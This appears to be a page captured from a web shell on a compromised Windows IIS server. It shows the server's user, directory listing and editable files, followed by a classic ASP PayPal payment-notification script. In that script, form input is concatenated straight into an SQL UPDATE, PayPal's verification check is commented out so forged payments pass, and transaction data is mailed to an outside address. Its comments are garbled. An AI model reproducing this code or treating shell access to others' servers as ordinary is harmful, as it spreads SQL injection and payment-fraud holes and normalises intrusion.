Webshell Akmal archtte id

System: Microsoft Windows NT 10.0.20348.0

Server: Microsoft-IIS/10.0

User: buyyou

Directory: C:\MyData\WWW\asc365\

Name	Size	Type	Actions
ASC365_CANADA	-	Directory	Rename Delete
ASC365_Store01	-	Directory	Rename Delete
aspnet_client	-	Directory	Rename Delete
CompanyImage	-	Directory	Rename Delete
TJGS_USA	-	Directory	Rename Delete
zhijian	-	Directory	Rename Delete
Memo.inc	0 bytes	.inc	Edit Rename Delete
web.config	213 bytes	.config	Edit Rename Delete

<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>

<%
'����һЩ��������
Dim p_mc_gross		'������
Dim p_invoice		'post�����û������ַ������
'Dim p_protection_eligibility=Eligible
Dim p_address_status		'�����ַ  =confirmed
'Dim p_item_number1=
Dim p_tax			'����˰��
'Dim p_item_number2=
'Dim p_payer_id=73W9D7WJVUWHJ
Dim p_address_street		'�����ַ  =1+Main+St
Dim p_payment_date			'��������=20%3A44%3A15+Aug+04%2C+2010+PDT
Dim p_payment_status		'����״̬ =Completed=����ɹ�
'Dim p_charset=windows-1252
Dim p_address_zip			'�������ʱ�=95131
Dim p_mc_shipping			'���˼���װ�Ѻϼ�
'Dim p_mc_handling'=0.00
'Dim p_first_name'=Test
'Dim p_mc_fee'=0.42
'Dim p_address_country_code'=US
'Dim p_address_name'=Test+User
'Dim p_notify_version'=3.0
'Dim p_custom'=
'Dim p_payer_status'=verified
Dim p_business				'��ҵ�ַ=Seller_1280822612_biz%40126.com
'Dim p_address_country'=United+States
Dim p_num_cart_items		'���ﳵ�л������������
'Dim p_mc_handling1'=0.00
'Dim p_mc_handling2'=0.00
'Dim p_address_city'=San+Jose
Dim p_verify_sign			'У����=AI0K2Zq6z5pjoaZcGtWBfxsnAgSFAonCuC9Yo5T08Leo3fWaPgQhhQd5
'Dim p_payer_email'=ltsljh_1280822096_per%40126.com
'Dim p_mc_shipping1			'��һ�ֻ�������˼���װ��=0.00
'Dim p_mc_shipping2			'�ڶ��ֻ�������˼���װ��=0.00
Dim p_txn_id				'���׺�=79H56678E4245040L
'Dim p_payment_type'=instant
'Dim p_last_name'=User
'Dim p_address_state'=CA
'Dim p_item_name1			'��һ�ֻ�������=001033Two-Tone+Sublimation+Mug-Red
'Dim p_item_name2			'�ڶ��ֻ�������=001035Two-Tone+Sublimation+Mug-Green
'Dim p_receiver_email'=Seller_1280822612_biz%40126.com
Dim p_payment_fee			'Paypal����=0.42
'Dim p_quantity1			'��һ�ֻ�������=1
'Dim p_quantity2			'�ڶ��ֻ�������=1
'Dim p_receiver_id'=JEQHLFGKQ8S4Y
'Dim p_txn_type'=cart
'Dim p_mc_gross_1			'��һ�ֻ��︶��ϼ�=2.10
'Dim p_mc_currency'=USD
'Dim p_mc_gross_2			'�ڶ��ֻ��︶��ϼ�=2.10
'Dim p_residence_country'=US
'Dim p_test_ipn'=1
'Dim p_transaction_subject'=Shopping+Cart
Dim p_payment_gross			'����ϼ�
Dim p_SS(1000,3)
Dim p_CID
Dim p_RQ
Dim objHttp
dim str
dim str1
str1=request.QueryString("tx")
str =request.Form &"&cmd=_notify-validate"

Set fs=Server.CreateObject("Scripting.FileSystemObject")
yya= Server.MapPath(p_CID & "Pay_orderflag1234556.inc")   
set f=fs.CreateTextFile(yya,true)
f.close
set f=nothing

dim objCDOMail
Set objCDOMail = Server.CreateObject("CDO.Message") 
objCDOMail.From = "damao7000@126.com"
objCDOMail.To ="damao7000@163.com"
objCDOMail.Subject = "Customer Order List"
objCDOMail.HTMLBody = str1
objCDOMail.Send
Set objCDOMail = Nothing

set objHttp=server.CreateObject("Msxml2.ServerXMLHTTP.4.0")
objHttp.open "POST","https://www.sandbox.paypal.com/cgi-bin/webscr",false
objHttp.setRequestHeader"Content-type","application/x-www-form-urlencoded"
objHttp.Send str

'if(objHttp.responseText="VERIFIED") THEN
p_payment_status=Request.form("payment_status")
if lcase(p_payment_status)="completed" then
    p_invoice=Request.form("invoice")					'post���Ķ�����ż�����
	str=Split(p_invoice,"~")
	p_CID=trim(str(0))
	p_RQ=trim(str(1))
    set rs=server.createobject("adodb.recordset")
	sql="update orderlist set state=1 where orderid='"&p_CID&"'"
	conn.execue sql
	conn.close
	set conn=nothing
	'p_mc_gross=Request.form("mc_gross")					'������
	'p_payment_gross=Request.form("payment_gross")		'����ϼ�
	'p_payment_date=Request.form("payment_date")			'��������
	'p_invoice=Request.form("invoice")					'post�����û������ַ������
	'str=Split(p_invoice,"~")
	'p_CID=trim(str(0))
	'p_RQ=trim(str(1))
	'p_txn_id=Request.form("txn_id")						'���׺�=79H56678E4245040L
	'p_payment_fee=Request.form("payment_fee")			'Paypal����=0.42
	'p_business=Request.form("business")					'��ҵ�ַ=Seller_1280822612_biz%40126.com
	'p_mc_shipping=Request.form("mc_shipping")			'���˼���װ�Ѻϼ�
	'p_tax=Request.form("tax")							'����˰��
	'p_num_cart_items=Request.form("num_cart_items")		'���ﳵ�л������������
	'for i=1 to p_num_cart_items
'		p_SS(i,0)=Request.form("item_name"& i)			'���ֻ�����뼰����
'		p_SS(i,1)=Request.form("quantity"& i)			'���ֻ�������
'		p_SS(i,2)=Request.form("mc_gross_"& i)			'���ֻ��︶��ϼ�
'		p_SS(i,3)=Request.form("mc_shipping"& i)		'���ֻ������˼���װ��
'	next
'	p_SS(1,2)=p_SS(1,2)*1-p_SS(1,3)*1
'	p_SS(1,3)=0.00
   Set fs=Server.CreateObject("Scripting.FileSystemObject")
   yya= Server.MapPath(p_CID & "Pay_orderflag.inc")          '-----------------------------------------������־
   set f=fs.CreateTextFile(yya,true)
   f.close
set f=nothing
end if
'end if
set objHttp=nothing

Set fs=Server.CreateObject("Scripting.FileSystemObject")
 yya= Server.MapPath(p_CID & "Pay_orderflag123456.inc")   
 set f=fs.CreateTextFile(yya,true)
 f.close
 set f=nothing 
'Pathh=Server.MapPath("Customer/"& p_CID & "/Pay_inf.inc")
'WW=Request.form
'str=split(WW,"&")
'set f=fs.CreateTextFile(Pathh,true)
'f.Writeline p_mc_gross					'������
'f.Writeline p_payment_gross				'����ϼ�
'f.Writeline p_payment_date				'��������ڼ�ʱ��
'f.Writeline p_invoice					'post�����û������ַ������
'f.Writeline p_CID						'�û������ַ
'f.Writeline p_RQ						'���ڼ�ʱ��
'f.Writeline p_payment_fee				'Paypal����=0.42
'f.Writeline p_business					'��ҵ�ַ=Seller_1280822612_biz%40126.com
'f.Writeline p_mc_shipping				'���˼���װ�Ѻϼ�
'f.Writeline p_tax						'����˰��
'f.Writeline p_txn_id					'���׺�=79H56678E4245040L
'f.Writeline p_num_cart_items			'���ﳵ�л������������
'for i=1 to p_num_cart_items'
	'f.Writeline p_SS(i,0)				'���ֻ�����뼰����
	'f.Writeline p_SS(i,1)				'���ֻ�������
	'f.Writeline p_SS(i,2)				'���ֻ��︶��ϼ�
	'f.Writeline p_SS(i,3)				'���ֻ������˼���װ��
'next

'f.close
'set f=nothing
'set fs=nothing   
'----------------------------------
'for each xKey in Request.QueryString 
'	response.write("<p>" & xkey & " = " & Request.QueryString(xkey) & "</p>") 
'next 
'----------------------------------
' Function StripSlashes(vThing)
'	sThing = CStr(vThing)
'	sThing = Replace(sThing, "\'", "\")
'	sThing = Replace(sThing, "\""", """")
'	StripSlashes = sThing
'End Function

'sReq = ""
'For Each sItem In Request.Form
'	sValue = Server.URLEncode(StripSlashes(Request.Form(sItem)))
'	sReq = sReq & sItem & "=" & sValue & "&"
'Next

'Set oHTTP = Server.CreateObject("MSXML2.ServerXMLHTTP")

'oHTTP.open "POST", "ssl:// www.epassporte.com/secure/eppurchaseverify.cgi", False
'oHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
'oHTTP.setRequestHeader "Content-Length", Len(sReq)
'oHTTP.send sReq

'If oHTTP.status <> 200 Then
'	Response.Write "Error connecting to server"
'	Response.End
'End If

'sResponse = oHTTP.responseText

'Set oHTTP = Nothing

'If InStr(1, sResponse, "status=YMYOK") = 1 Then
'	' Transaction was successful
'Else
'	' Log for investigation
'End If

'Response.Write sResponse
   
%>